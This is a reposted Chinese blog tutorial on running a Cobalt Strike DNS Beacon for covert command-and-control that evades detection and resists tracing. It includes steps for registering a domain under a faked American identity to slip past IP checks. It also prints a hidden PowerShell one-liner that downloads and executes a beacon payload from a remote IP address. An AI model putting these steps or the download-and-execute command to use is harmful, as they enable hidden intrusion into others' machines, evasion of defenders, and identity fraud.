【远控使用】Cobalt Strike之DNS Beacon(反溯源)

admin 2022年1月10日03:32:59安全博客评论61 views1109字阅读3分41秒阅读模式

前言

  • 实际意义:红蓝对抗中,可以通过DNS的方式通信,流量更加隐秘,躲避agent/DLP的检测,实现相对隐秘的渗透方式,反溯源。

  • 环境:vps(linux)注意这里有个雷区,需要打开53端口的TCP和UDP,截个图大家看看,这个地方我踩哭了,因为新手一直以为是TCP,结果因为没开UDP,导致一直不成功。

  • 前期思路准备:

    1、国外域名

    2、cobaltstrike 3.3

    3、国外代理

image-20210904150540499

域名和解析域名服务器的免费申请和配置

1、挂上代理,去国外免费域名网站找一个域名注册

image-20210904151757886

2、然后点击免费获取,然后接着往下走

image-20210904151857754

3、这里需要注意,因为ip检查,可能正常的瞎填信息无法获取订单,首先去查ip网站确定我们代理的具体位置

image-20210904152226132

4、这里是美国地区,所以伪造一个美国人的身份信息,利用美国人身份生成网站,同理,如果你是德国地区,去找一个伪造德国人身份的网站就行了。接着输入,我们刚刚查到的州名字

image-20210904152814017

5、将获得的信息填入订单信息中,然后提交,这样应该不会报错

image-20210904152846467

6、接着进入自己的域名区域

image-20210904152917063

7、可以看到多了一个

image-20210904152942182

8、打开dns解析的服务器,注册一个号,添加域名,他会提醒你要修改原服务器的ns,所以改一下,不然没用了

①点管理域

image-20210904153532731

②在管理工具中的NamesServers中点击自定义服务器名,这样就完成了,可以解析了

image-20210904155259321

9、就可以看到解析成功了

image-20210904155446681

10、绕了一路终于到了设置解析了

image-20210904155623524

11、接着在vps中打开teamserver,就可以连接了

image-20210904155800074

DNS beacon cs上线

其实只要前面的步骤都做对了,后面的操作就比较基础了

image-20210904150310151

1、支持命令行切换到该模式:mode dns,将http通信方式,改为使用dns的a记录方式进行通信(传输数据小),下面和上面的差不多

2、同上,mode dns-txt只是改为使用dns的txt方法进行通信(传输数据大)有效负载使用dns txt记录下载和分级混合http和dns beacon

首先打开监听,然后按照图片设置,默认是53端口

image-20210904160032890

景象会是这样的

image-20210904160115047

可以用lsof查看53端口是否打开

image-20210904160243319

接着用dig +trace来看看是否走的通

image-20210904160454001

内容过长,只看重点

image-20210904160517095

这就成功了,接着我们生成一个web传递试试效果

image-20210904160650407

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.99.163.64:80/a'))"

接着找一个windows 3以上的服务器运行一下就行了

image-20210904161048191

收到一个了一个黑屏的beacon

image-20210904161114217

接着我们可以用sleep 5 或者是checkin,将其回显

image-20210904161402005

我的个人博客

孤桜懶契:http://gylq.gitee.io

FROM:gylq.gitee Author:孤桜懶契

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月10日03:32:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【远控使用】Cobalt Strike之DNS Beacon(反溯源) https://cn-sec.com/archives/730005.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: